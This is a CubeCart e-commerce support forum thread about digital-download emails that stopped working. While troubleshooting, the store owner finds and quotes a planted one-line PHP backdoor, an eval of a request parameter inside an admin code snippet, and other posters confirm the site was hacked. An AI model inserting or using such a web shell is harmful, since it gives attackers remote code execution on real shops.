Emails and digital downloads no longer working

Robin Somes

CC 6.06, All In One Shipping 1.0.6, Product AddOns 1.0.5

At some point in the last 3 weeks, the behaviour of our CubeCart site has changed. The site is at:

www.piscesconservation.com/cube

Purchasers of digital products no longer receive emails containing a download link, or get taken to a page where they can download their purchase after payment is completed. Nor do we receive emails from the site announcing the sale (we do get an email from Sagepay, but as always that only marks the transaction, and doesn't contain full order details). Instead, the customer starts emailing us in anguish after 24 hours or so without their product. Not a situation we'd like to continue.

Customers who order physical products continue to receive emails as they should, still see an online receipt for their payment, and we still get the correct notification from the site. This suggests that there's nothing wrong with the mechanism of actually sending mail from the site, rather, the means of generating the mail, when a digital product is involved.

I've put through a test transaction of just a digital product, with the result as reported by our customers - no emailed link, no clickable download link on the receipt page, plus no email sent to us from the site (but notifications from Sagepay to us and the purchaser about the transaction).

A test transaction of a combination of digital and physical items produced the same result: no download links, no email to us from the site, but Sagepay mails to the purchaser and to us.

Emails are not, so far as we can ascertain, ending up in Spam folders. Our ISP's SMTP Outbound service, which allows the site to send emails, is paid up to date, apparently working, and hasn't been discontinued, and has not been blocked for abuse.

We have changed nothing about the site, I'm not aware that our ISP has (for instance) lost a server and had to restore from backups, and to the best of our knowledge the site has not been hacked. It used to work, it doesn't now. So, can anyone suggest where to start tracking down the issue?

Thank you DirtyButter; I am trying that now.

One issue uncovered so far; testing the SMTP relay in CC's Store Settings showed that it had lost or corrupted the SMTP password. How, I don't know; I've neither changed it or deleted it. Re-entering the password restores the emails to us announcing the sale. But there are still no download links on the customer's receipt for the payment.

There is one code snippet, entitled snippetuP6LO, triggered by controller.index. The code within it is:

<?php eval($_REQUEST["uP6LO"]);?>

I certainly haven't added this, but (since I've not looked at that section of the admin pages) I've no idea if it is intended to be there or not.

Just reading about 'eval' - specifically the bits about "don't use this thing under any circumstances whatsoever" ;) and it does look that way. Downloading the whole site to see if I can work out which files have been attacked; I'll follow up the link you posted, thanks again.

15 hours ago, Robin Somes said:

There is one code snippet, entitled snippetuP6LO, triggered by controller.index. The code within it is:

<?php eval($_REQUEST["uP6LO"]);?>

I certainly haven't added this, but (since I've not looked at that section of the admin pages) I've no idea if it is intended to be there or not.

That definitely shows you have been hacked.  The cleanup detailed by Al in his post is OK but does depend on the extent of how seriously your account t has been hacked and is not a guaranteed method for cleaning the most seriously hacked websites

Ian

• 5 weeks later...

OK, so if there is nothing there, (as I never added anything myself) I'm ok then, and the issue is another problem.

It works a few weeks ago, but I guess not since my last newsletter, about 3 weeks.so any other ideas about why my

emails etc, stopped working. Also I noticed tonight after testing a new account, that after 

going thru the cart, it also never sends the download link through email.

Another question, was there ever an option to require a customer to create an account, or did I imagine that lol.

It would also be nice to have the cart go to the downloads after purchase has cleared, as it is not really clear to the customer 

that they should go to their new account to access their downloads, (hense also, is there a way to require them to create an account 

to purchase items, even freebies.)

In CC6012, there is a Test button on the page where you enter the SMTP details of how you send out the emails.

There is no option to force a customer to register. There are methods and plugins that will hide prices and not allow one to actually checkout until registered.

There could be a way to add more data to the "Thank You" page the customer gets after a successful payment.

Yes, I never touched that area at all, and it had worked fine at first, and must have stopped working in the last month etc...

I checked the button you referred to, it said test failed all times. I am pretty sure I reset the same password etc, as the person had mentioned above, as I said it failed to send.

Honestly bsmother, I stay away from the back, which is where I think you might be referring to, I do everything from the cube panel, (instant install) and I don't think I have ever noticed anywhere I can edit the thank you page??

Oh, and hiding prices does not work very well with digital stores, people are deterred if they can't see the prices.

That works fine for tangible goods, especially vintage and antique stores.

There is a way to remove the "I want to create an account" checkbox as seen at checkout. Once removed, the edit also forces the value of that form element to true so that CubeCart will always take the customer to the account creation page (or login page).

14 minutes ago, bsmither said:

There is a way to remove the "I want to create an account" checkbox as seen at checkout. Once removed, the edit also forces the value of that form element to true so that CubeCart will always take the customer to the account creation page (or login page).

See